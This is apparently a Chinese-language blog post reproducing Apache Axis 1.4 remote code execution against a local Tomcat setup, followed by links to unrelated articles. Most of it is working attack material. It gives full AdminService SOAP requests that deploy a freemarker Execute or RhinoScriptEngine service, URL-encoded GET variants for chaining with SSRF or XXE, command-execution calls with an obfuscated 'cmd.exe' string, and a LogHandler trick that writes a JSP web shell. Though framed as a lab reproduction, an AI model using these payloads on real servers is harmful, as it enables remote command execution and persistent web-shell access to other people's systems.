1、环境搭建

在idea 上新建项目,然后用tomcat运行即可

2、漏洞复现

2、1 freemarker.template.utility.Execute

如果项目里面没有freemarker 就添加,这里添加的是 freemarker-2.3.30.jar

  • 创建 freemarkerTest services ,返回Done processing 即表示创建成功,同时访问services页面也可以看到freemarkerTest services
  1. POST /services/AdminService HTTP/1.1
  2. Pragma: no-cache
  3. Cache-Control: no-cache
  4. sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
  5. sec-ch-ua-mobile: ?0
  6. Upgrade-Insecure-Requests: 1
  7. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
  8. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  9. Sec-Fetch-Site: same-origin
  10. Sec-Fetch-Mode: navigate
  11. Sec-Fetch-User: ?1
  12. Sec-Fetch-Dest: document
  13. Referer: http://localhost:8083/services
  14. Accept-Encoding: gzip, deflate
  15. Accept-Language: zh-CN,zh;q=0.9
  16. Connection: close
  17. SOAPAction:
  18. Content-Type: text/xml;charset=UTF-8
  19. Host: localhost:8083
  20. Content-Length: 632
  22. <?xml version="1.0" encoding="UTF-8"?>
  23. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  24.   <soapenv:Body>
  25.     <deployment xmlns="http://xml.apache.org/axis/wsdd/"
  26.                 xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
  27.        <service name="freemarkerTest" provider="java:RPC">
  28. 		<parameter name="className" value="freemarker.template.utility.Execute"/>
  29. 		<parameter name="allowedMethods" value="*"/>
  30.        </service>
  31.     </deployment>
  32.   </soapenv:Body>
  33. </soapenv:Envelope>
  • GET 创建service ,配合ssrf xxe 使用(当 "enableRemoteAdmin" 为 "false" )时
  1. !--><deployment xmlns="http://xml.apache.org/axis/wsdd/"
  2.                 xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
  3.        <service name="freemarkerTest" provider="java:RPC">
  4. 		<parameter name="className" value="freemarker.template.utility.Execute"/>
  5. 		<parameter name="allowedMethods" value="*"/>
  6.        </service>
  7.     </deployment

进行urlencode

  1. %21%2d%2d%3e%3c%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6a%61%76%61%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%70%72%6f%76%69%64%65%72%73%2f%6a%61%76%61%22%3e%0a%20%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%54%65%73%74%22%20%70%72%6f%76%69%64%65%72%3d%22%6a%61%76%61%3a%52%50%43%22%3e%0a%09%09%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%63%6c%61%73%73%4e%61%6d%65%22%20%76%61%6c%75%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%2f%3e%0a%09%09%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%61%6c%6c%6f%77%65%64%4d%65%74%68%6f%64%73%22%20%76%61%6c%75%65%3d%22%2a%22%2f%3e%0a%20%20%20%20%20%20%20%3c%2f%73%65%72%76%69%63%65%3e%0a%20%20%20%20%3c%2f%64%65%70%6c%6f%79%6d%65%6e%74
  3. http://localhost:8083/services/AdminService?method= 将urlencode之后的值放在此处

  • 执行命令
  1. POST /services/freemarkerTest HTTP/1.1
  2. sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
  3. sec-ch-ua-mobile: ?0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  7. Sec-Fetch-Site: same-origin
  8. Sec-Fetch-Mode: navigate
  9. Sec-Fetch-User: ?1
  10. Sec-Fetch-Dest: document
  11. Referer: http://localhost:8083/services
  12. Accept-Encoding: gzip, deflate
  13. Accept-Language: zh-CN,zh;q=0.9
  14. Connection: close
  15. SOAPAction:
  16. Content-Type: text/xml;charset=UTF-8
  17. Host: localhost:8083
  18. Content-Length: 671
  20. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  21.   <soapenv:Body>
  22.     <exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  23.       <arg0 href="#id0"/>
  24.     </exec>
  25.     <multiRef id="id0" soapenc:root="0" soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" soapenc:arrayType="xsd:anyType[1]" xsi:type="soapenc:Array" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
  26.       <multiRef xsi:type="soapenc:string">cmd.exe /c echo 111111</multiRef>
  27.     </multiRef>
  28.   </soapenv:Body>
  29. </soapenv:Envelope>

  1. <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://utility.template.freemarker" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
  2.    <soapenv:Header/>
  3.    <soapenv:Body>
  4.       <util:exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  5.          <arguments>
  6.             <string xsi:type="soapenc:string">cmd.exe /c whoami</string>
  7.          </arguments>
  8.       </util:exec>
  9.    </soapenv:Body>
  10. </soapenv:Envelope>

  • 卸载service
  1. POST /services/AdminService HTTP/1.1
  2. Pragma: no-cache
  3. Cache-Control: no-cache
  4. sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
  5. sec-ch-ua-mobile: ?0
  6. Upgrade-Insecure-Requests: 1
  7. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
  8. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  9. Sec-Fetch-Site: same-origin
  10. Sec-Fetch-Mode: navigate
  11. Sec-Fetch-User: ?1
  12. Sec-Fetch-Dest: document
  13. Referer: http://localhost:8083/services
  14. Accept-Encoding: gzip, deflate
  15. Accept-Language: zh-CN,zh;q=0.9
  16. Connection: close
  17. SOAPAction:
  18. Content-Type: text/xml;charset=UTF-8
  19. Host: localhost:8083
  20. Content-Length: 395
  22. <?xml version="1.0" encoding="UTF-8"?>
  23. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  24.   <soapenv:Body>
  25.     <undeployment xmlns="http://xml.apache.org/axis/wsdd/">
  26.       <service name="freemarkerTest"/>
  27.     </undeployment>
  28.   </soapenv:Body>
  29. </soapenv:Envelope>
  1. http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%75%6e%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%3e%0a%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%54%65%73%74%22%2f%3e%0a%20%20%20%20%3c%2f%75%6e%64%65%70%6c%6f%79%6d%65%6e%74

2、2 com.sun.script.javascript.RhinoScriptEngine

jdk <= 1.7 可用 本地复现用的 jdk 1.7.0_79

  • 创建services
  1. POST /services/AdminService HTTP/1.1
  2. Pragma: no-cache
  3. Cache-Control: no-cache
  4. sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
  5. sec-ch-ua-mobile: ?0
  6. Upgrade-Insecure-Requests: 1
  7. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
  8. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  9. Sec-Fetch-Site: same-origin
  10. Sec-Fetch-Mode: navigate
  11. Sec-Fetch-User: ?1
  12. Sec-Fetch-Dest: document
  13. Referer: http://localhost:8083/services
  14. Accept-Encoding: gzip, deflate
  15. Accept-Language: zh-CN,zh;q=0.9
  16. Connection: close
  17. SOAPAction:
  18. Content-Type: text/xml;charset=UTF-8
  19. Host: localhost:8083
  20. Content-Length: 1074
  22. <?xml version="1.0" encoding="UTF-8"?>
  23. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  24.   <soapenv:Body>
  25.     <deployment xmlns="http://xml.apache.org/axis/wsdd/"
  26.                 xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
  27.        <service name="RhinoScriptEngineServiceTest" provider="java:RPC">
  28.           <parameter name="className" value="com.sun.script.javascript.RhinoScriptEngine" />
  29.           <parameter name="allowedMethods" value="eval" />
  30.           <typeMapping deserializer="org.apache.axis.encoding.ser.BeanDeserializerFactory"
  31.                      type="java:javax.script.SimpleScriptContext"
  32.                      qname="ns:SimpleScriptContext"
  33.                      serializer="org.apache.axis.encoding.ser.BeanSerializerFactory"
  34.                      xmlns:ns="urn:beanservice" regenerateElement="false">
  35.           </typeMapping>
  36.       </service>
  37.     </deployment>
  38.   </soapenv:Body>
  39. </soapenv:Envelope>
  • GET 创建service ,配合ssrf xxe 使用(当 "enableRemoteAdmin" 为 "false" )时
  1. !--><deployment xmlns="http://xml.apache.org/axis/wsdd/"
  2.                 xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
  3.        <service name="RhinoScriptEngineServiceTest" provider="java:RPC">
  4.           <parameter name="className" value="com.sun.script.javascript.RhinoScriptEngine" />
  5.           <parameter name="allowedMethods" value="eval" />
  6.           <typeMapping deserializer="org.apache.axis.encoding.ser.BeanDeserializerFactory"
  7.                      type="java:javax.script.SimpleScriptContext"
  8.                      qname="ns:SimpleScriptContext"
  9.                      serializer="org.apache.axis.encoding.ser.BeanSerializerFactory"
  10.                      xmlns:ns="urn:beanservice" regenerateElement="false">
  11.           </typeMapping>
  12.       </service>
  13.     </deployment

进行urlencode

  1. http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6a%61%76%61%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%70%72%6f%76%69%64%65%72%73%2f%6a%61%76%61%22%3e%0a%20%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%53%65%72%76%69%63%65%54%65%73%74%22%20%70%72%6f%76%69%64%65%72%3d%22%6a%61%76%61%3a%52%50%43%22%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%63%6c%61%73%73%4e%61%6d%65%22%20%76%61%6c%75%65%3d%22%63%6f%6d%2e%73%75%6e%2e%73%63%72%69%70%74%2e%6a%61%76%61%73%63%72%69%70%74%2e%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%22%20%2f%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%61%6c%6c%6f%77%65%64%4d%65%74%68%6f%64%73%22%20%76%61%6c%75%65%3d%22%65%76%61%6c%22%20%2f%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%74%79%70%65%4d%61%70%70%69%6e%67%20%64%65%73%65%72%69%61%6c%69%7a%65%72%3d%22%6f%72%67%2e%61%70%61%63%68%65%2e%61%78%69%73%2e%65%6e%63%6f%64%69%6e%67%2e%73%65%72%2e%42%65%61%6e%44%65%73%65%72%69%61%6c%69%7a%65%72%46%61%63%74%6f%72%79%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%79%70%65%3d%22%6a%61%76%61%3a%6a%61%76%61%78%2e%73%63%72%69%70%74%2e%53%69%6d%70%6c%65%53%63%72%69%70%74%43%6f%6e%74%65%78%74%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%71%6e%61%6d%65%3d%22%6e%73%3a%53%69%6d%70%6c%65%53%63%72%69%70%74%43%6f%6e%74%65%78%74%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%65%72%69%61%6c%69%7a%65%72%3d%22%6f%72%67%2e%61%70%61%63%68%65%2e%61%78%69%73%2e%65%6e%63%6f%64%69%6e%67%2e%73%65%72%2e%42%65%61%6e%53%65%72%69%61%6c%69%7a%65%72%46%61%63%74%6f%72%79%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6e%73%3d%22%75%72%6e%3a%62%65%61%6e%73%65%72%76%69%63%65%22%20%72%65%67%65%6e%65%72%61%74%65%45%6c%65%6d%65%6e%74%3d%22%66%61%6c%73%65%22%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%2f%74%79%70%65%4d%61%70%70%69%6e%67%3e%0a%20%20%20%20%20%20%3c%2f%73%65%72%76%69%63%65%3e%0a%20%20%20%20%3c%2f%64%65%70%6c%6f%79%6d%65%6e%74
  • 执行命令
  1. <?xml version='1.0' encoding='UTF-8'?>
  2. <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com">
  3.   <soapenv:Body>
  4.     <eval xmlns="http://localhost:8083/services/scriptEngine">
  5.       <arg0 xmlns=""><![CDATA[function test(){var cmd1='c'; cmd1 += 'm';cmd1 += 'd';cmd1 += '.';cmd1 += 'e';   cmd1 += 'x';cmd1 += 'e';var cmd2 = '/'; cmd2 += 'c'; var pb = new java.lang.ProcessBuilder(cmd1,cmd2,'ver');var process = pb.start(); var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next();return ret;}test();]]>
  6.       </arg0>
  7.       <arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice"></arg1>
  8.     </eval>
  9.   </soapenv:Body>
  10. </soapenv:Envelope>
  • 卸载service
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  3.   <soapenv:Body>
  4.     <undeployment xmlns="http://xml.apache.org/axis/wsdd/">
  5.       <service name="RhinoScriptEngineServiceTest"/>
  6.     </undeployment>
  7.   </soapenv:Body>
  8. </soapenv:Envelope>
  1. http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%75%6e%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%3e%0a%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%53%65%72%76%69%63%65%54%65%73%74%22%2f%3e%0a%20%20%20%20%3c%2f%75%6e%64%65%70%6c%6f%79%6d%65%6e%74

2、3 写文件

  • 创建service
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  3.   <soapenv:Body>
  4.     <deployment xmlns="http://xml.apache.org/axis/wsdd/"
  5.                 xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
  6.        <service name="writeFile2" provider="java:RPC">
  7. 		<requestFlow>
  8.             <handler type="java:org.apache.axis.handlers.LogHandler" >
  9.                 <parameter name="LogHandler.fileName" value="F:/work/SpringStudy/out/artifacts/axis_rce_test_war_exploded/shell123.jsp" />
  10.                 <parameter name="LogHandler.writeToConsole" value="false" />
  11.             </handler>
  12.          </requestFlow>
  13.           <parameter name="className" value="java.util.Random" />
  14.           <parameter name="allowedMethods" value="*" />
  15.        </service>
  16.     </deployment>
  17.   </soapenv:Body>
  18. </soapenv:Envelope>
  • 写文件
  1. <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://util.java">
  2.    <soapenv:Header/>
  3.    <soapenv:Body>
  4.       <util:ints soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  5.          <in0 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance"><![CDATA[
  6. <%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
  7. ]]></in0>
  8.          <in1 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance">?</in1>
  9.       </util:ints>
  10.    </soapenv:Body>
  11. </soapenv:Envelope>

参考

Axis <=1.4 RCE 复现的更多相关文章

  1. 应用Apache Axis进行Web Service开发

    转自(http://tscjsj.blog.51cto.com/412451/84813) 一.概述 SOAP原意为Simple Object Access Protocol(简单对象访问协议),是一 ...

  2. 有理数的稠密性(The rational points are dense on the number axis.)

    每一个实数都能用有理数去逼近到任意精确的程度,这就是有理数的稠密性.The rational points are dense on the number axis.

  3. 使用axis开发web service服务端

    一.axis环境搭建 1.安装环境 JDK.Tomcat或Resin.eclipse等. 2.到 http://www.apache.org/dyn/closer.cgi/ws/axis/1_4下载A ...

  4. AXIS最佳实践

    前言: Axis是apache一个开源的webservice服务,需要web容器进行发布.本节主要用于介绍使用Axis开发webservice,包括服务端的创建.webservice的部署.客户端的调 ...

  5. axis 理解

    前言 使用numpy sum(a,axis=0)的时候,对axis参数比较费解,和直觉不太一样,故此记录 b = np.arange(12).reshape(3,4) b array([[ 0, 1, ...

  6. Axis 1 https(SSL) client 证书验证错误ValidatorException workaround

    Axis 1.x 编写的client在测试https的webservice的时候, 由于client 代码建立SSL连接的时候没有对truststore进行设置,在与https部署的webservic ...

  7. axis

    http://www.cnblogs.com/liyanblog/archive/2011/11/29/2266942.html 报错: D:\ws\la\WSofSMNS\WebRoot\WEB-I ...

  8. 【知识积累】服务器端获取客户端的IP地址(当客户端调用由Axis开发的WebService)

    一.前言 由于项目中一个小的模块需要获取客户端的IP地址以保证安全调用webservice接口,项目中客户端使用C#编写,服务器端使用Java编写,服务器端与客户端采用Axis开发的WebServic ...

  9. 使用axis调用WebService服务端

    由于项目中要调用其他公司的接口,研究了下axis调用webService这种方式,现将代码贴出,以备以后查阅: package com.xbq; import javax.xml.namespace. ...

  10. MATLAB axis和axes的区别

    axis中文为“轴”之意,在matlab中用于控制坐标轴的范围和样式(颜色等). axis([XMIN XMAX YMIN YMAX]) 设置当前所绘图像的x轴和y轴的范围.axis([XMIN XM ...

随机推荐

  1. BUUCTF-[SUCTF 2019]CheckIn(.user.ini利用+exif_imagetype绕过)

    目录 分析 .user.ini使用条件 解题 参考链接 记一道.user.ini利用+exif_imagetype绕过的文件上传的题. 分析 先正经上传一张图片.回显了存储路径,同时发现还包含了一个i ...

  2. 原生js 以ajax(post)的方式传json至php,并让php解析为数组

    如题. 比如要把一个json,如 json= {name:"John Rambo", time:"3pm"},,通过js ,传到一个php服务器 fwq.php ...

  3. 有关SQL注入的一些小知识点

    1.判断注入点: 本质原理是找一个需要后台处理后,提交给数据库的点,我理解为用户可以控制并输入后台数据库的变量,比如我们DVWA SQL injection 的ID  ,我们可以通过闭合单引号,#注释 ...

  4. ad 差分布线 等长布线

    差分要素: 1.原理图差分对名字后缀必须是 _n _p 2.规则改动 定义差分线宽和间距

  5. Mybatis-Plus入门学习笔记(一)

    本文内容 了解Mybatis-Plus 整合Mybatis-Plus 1.了解Mybatis-plus 1.1.Mybatis-Plus介绍 MyBatis-Plus(简称 MP)是一个 MyBati ...

  6. JavaWeb学习笔记(五)

    本文内容 1. JSP: 1. 指令 2. 注释 3. 内置对象 2. MVC开发模式 3. EL表达式 4. JSTL标签 5. 三层架构 JSP: 1. 指令 * 作用:用于配置JSP页面,导入资 ...

  7. JdbcTemplateUtils

    package com.meeno.common.utils; import com.alibaba.fastjson.JSONArray; import com.alibaba.fastjson.J ...

  8. Git分支创建命令

    一. 创建test分支提交步骤 1.列出所有分支 # git branch -a 2.创建test分支          # git branch test 3.切换到test分支:         ...

  9. 【转】Java 开发必会的 Linux 命令

    转自:https://www.cnblogs.com/zhuawang/p/5212809.html 作为一个Java开发人员,有些常用的Linux命令必须掌握.即时平时开发过程中不使用Linux(U ...

  10. 14.SpringMVC之文件上传下载

    SpringMVC通过MultipartResolver(多部件解析器)对象实现对文件上传的支持. MultipartResolver是一个接口对象,需要通过它的实现类CommonsMultipart ...